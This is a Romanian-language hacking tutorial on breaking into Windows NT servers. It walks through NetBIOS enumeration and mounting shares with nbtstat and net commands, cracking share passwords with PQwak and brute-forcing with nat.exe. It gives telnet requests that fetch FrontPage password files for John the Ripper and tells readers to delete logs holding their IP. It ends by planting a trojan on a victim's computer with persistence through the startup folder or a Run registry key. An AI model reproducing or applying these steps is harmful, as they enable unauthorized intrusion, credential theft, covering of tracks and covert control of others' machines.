vulnerabilitatile unui server

[zbeng]

:: Windows NT Hacking ::.

.:: Ca sa Hackeriti cu succes un sever, trebuie sa aveti acelasi sistem de operare ::.

Continut:

1)Hackeriti serverul de la distanta

2)Hackeriti paginile Web gazduite de acesta

3)Infiltrati troieni peun calculator pe care aveti acces(cum ar fi calculatorul scolii).

11)In tutorialul precedent a fost prezentata o mare vulnerabilitate a windowsului si anume optiunea "file and print sharing".Programele necesare sunt nbtstat.exe(il aveti deja),net.exe(probabil il aveti si pe acesta) si nat.exe.Deoarece stiti deja ce face nbtstatul trcecem la celelalte doua programe.In exemplul nostru presupunem ca serverul are IP-ul 123.123.123.123. iar numele este server.com .IP-ul se poate afla cu ajutorul comenzii "tracert -j http://www.server.com."Apoi se foloseste comanda "nbtstat -A 123.123.123.123. "Iata rezultatul acestei comenzi:

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

STUDENT1 <20> UNIQUE Registered

STUDENT1 <00> UNIQUE Registered

DOMAIN1 <00> GROUP Registered

DOMAIN1 <1C> GROUP Registered

DOMAIN1 <1B> UNIQUE Registered

STUDENT1 <03> UNIQUE Registered

DOMAIN1 <1E> GROUP Registered

DOMAIN1 <1D> UNIQUE Registered

..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Student1 este numele computerului.Apoi dupa ce am aflat aceasta informatie tastam:

C:>net view 123.123.123.123

C:>net view student1

Shared resources at 123.123.123.123

Share name Type Used as Comment

------------------------------------------------------------------------------

NETLOGON Disk Logon server share

Test Disk

The command completed successfully.

Asa aflam daca optiunea "file and print sharing este" activata.Apoi tastam urmatoarea comanda:

C:net use x: 123.123.123.123test

The command completed successfully.

Acum sa accesam noul disc creat si anume X:

C:net use

New connections will be remembered.

Status Local Remote Network

-------------------------------------------------------------------------------

OK X: 123.123.123.123test Microsoft Windows Network

OK 123.123.123.123test Microsoft Windows Network

The command completed successfully.

In mod normal cand gasim un calculator cu "file and print sharing" ni se cere o parola.Aceata parola o putem sparge cu ajutorul programului PQwak.exe.Rulati-l,completati formularul si apoi asteptati.Nu trebuie sa asteptati prea mult.

Acum sa prezentam programul Nat.exe,foarte preferat de hackeri.Iata optiunile acestuia:

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

OPTIONS

-o Specifica fisierul in care se vor depune rezultatele scanarii unei "raze" de IP.

-u Specifica fisierul care contine numele de utilizatori(useri)

-p Specifica fisierul care contine parolele(password)

<address>

raza de IP care trebuie scanata.Iata un exempu.

C:nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30

Chiar daca nu "sparge" parola,totusi gaseste calculatoarele cu "file and print sharing" ceea ce este acelasi lucru pentu ca folosim programul PQwak.

2)Acesta este o lista care contine fisiere importante de pe server in relatie cu discul c:/ adica adresa fizica.

C:InetPubwwwroot <Home>

C:InetPubscripts /Scripts

C:InetPubwwwroot_vti_bin /_vti_bin

C:InetPubwwwroot_vti_bin_vti_adm /_vti_bin/_vti_adm

C:InetPubwwwroot_vti_bin_vti_aut /_vti_bin/_vti_aut

C:InetPubcgi-bin /cgi-bin

C:InetPubwwwrootsrchadm /srchadm

C:WINNTSystem32inetserviisadmin /iisadmin

C:InetPubwwwroot_vti_pvt

C:InetPubwwwrootsamplesSearchQUERYHIT.HTM Internet Information Index Server sample

C:program FilesMicrosoft FrontPage_vti_bin

C:program FilesMicrosoft FrontPage_vti_bin_vti_aut

C:program FilesMicrosoft FrontPage_vti_bin_vti_adm

C:WINNTSystem32inetserviisadminhtmldocsadmin.htm /iisadmin/isadmin

Stiind aceste lucruri putem hackeri serverul via html(adica putem schimba paginile web).Intai trebuie sa testam cu ajutorul telnetului existenta acestor "rute".

c:/windows>telnet 123.123.123.212 80(telnet pe serverul cu adresa 123.123.123.123 pe portul 80) si dam comenzile:

GET /_vti_inf.html -------ne asiguram ca este instalat frontpage

GET /_vti_pvt/service.pwd-------ne asiguram daca exista un fisier cu parola

GET /_vti_pvt/authors.pwd ----numai pentru servere Netscape(contine parola si userul criptate)-folositi "john the ripper"

GET /_vti_pvt/administrators.pwd

GET /_vti_log/author.log -----dupa ce patrundem pe server acest fisier trebuie sters sau schimbat deoarece contine adresa voastra IP

Deschidem Frontpage Explorer sau Frontage Express (pentru Windows 95) ,optiunea OPEN si selectam pagina dorita aflata la distanta http:// (restul completam noi).Puteti incerca asa cu pagina mea,completind in rubrica "location" http://www.nebunu.home.ro.Evident vi se va cere parola dar Windows NT este foarte vulnerabil.Pagina mea de la home.ro nu se afla gazduita peun server sub Windows,asa ca nu ncercati numic,v-ati putea pierde contul de NET .

3)Un troian este un program cu ajutorul caruia puteti patrunde pe calculatorul altei persoane.Un asemenea program este compus din doua fisiere executabile(server.exe si client.exe.).Server.exe trebuie rulat pe calculatorul fraierului iar cu ajutorul programului client.exe va conectati.Daca aveti acces la un calculator trebuie sa instalati programul astfel incat sa fie rulat la butarea calculatorului.E mai smplu decat sa astepti sa-l ruleze cineva.Voi da doua metode:

"1" Il introduceti in calea de startup.Pentru Windows95/98 calea este c/windows/start menu/programs/startup/server.exe.

"2" Cred ca aceasta metoda este buna pentru orice fel de Windows.Creati fisierul "fisier.reg" in care scrieti secventa urmatoare:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

"nebunu"="server.exe"

apoi il executati.Ca urmare a acestei executii se modifica registrii windowsului.Incercati cu alt program inofensiv cum ar fi notepad.exe.

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

"nebunu"="notepad.exe"